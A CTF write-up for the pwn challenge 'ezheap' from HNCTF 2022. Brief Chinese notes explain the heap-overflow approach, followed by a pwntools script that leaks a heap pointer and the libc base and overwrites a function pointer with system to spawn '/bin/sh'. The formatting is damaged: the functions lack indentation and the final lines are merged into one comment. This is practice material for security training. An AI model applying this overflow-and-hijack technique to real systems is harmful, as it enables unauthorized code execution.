Problem: [HNCTF 2022 WEEK4]ezheap
思路
可以进行任意长度溢出
溢出拿到chunk1的值,然后继续溢出拿libc_base system 随后恢复堆成之前的样子同时修改名字为bin/sh 然后puts函数修改成system 这样当show的时候就会直接变成system(“/bin/sh”)
EXP
from pwn import *
context.log_level = 'debug'
p = remote("node5.anna.nssctf.cn",27862)
#p = process("./ezheap")
e = ELF('./ezheap')
libc = ELF('/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
def new(idx,size,name,content):
p.sendafter(b'Choice: \n',str(1))
p.sendafter(b'Input your idx:\n',str(idx))
p.sendafter(b'Size:\n',str(size))
p.sendafter(b'Name: \n',name)
p.sendafter(b'Content:\n',content)
def free(idx):
p.sendafter(b'Choice: \n',str(2))
p.sendafter(b'Input your idx:\n',str(idx))
def show(idx):
p.sendafter(b'Choice: \n',str(3))
p.sendafter(b'Input your idx:\n',str(idx))
def edit(idx,size,content):
p.sendafter(b'Choice: \n',str(4))
p.sendafter(b'Input your idx:\n',str(idx))
p.sendafter(b'Size:\n',str(size))
p.send(content)
new(0,0x20,b'qwq',b'a'*0x20)
new(1,0x20,b'qwq',b'a'*0x20) #0x30+0x30
edit(0,0x30,b'a'*0x30)
show(0)
p.recvuntil(b'a'*0x30)
chunk_idx_1 = u64(p.recv(6).ljust(8,b'\x00'))
log.success("leak chunk_idx_1 =>"+hex(chunk_idx_1))
edit(0,0x50,b'a'*0x50)
show(0)
p.recvuntil(b'a'*0x50)
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
log.success("leak puts_addr =>"+hex(puts_addr))
libc_base = puts_addr - libc.sym["puts"]
log.success("leak libc_base =>"+hex(libc_base))
system_addr = libc_base + libc.sym["system"]
payload = b'a'*0x20 + p64(0) +p64(0x31) +b'/bin/sh\x00'+p64(0)+p64(chunk_idx_1)+p64(0x1)+p64(system_addr)
edit(0,len(payload),payload)
show(1)
#attach(p)p.interactive()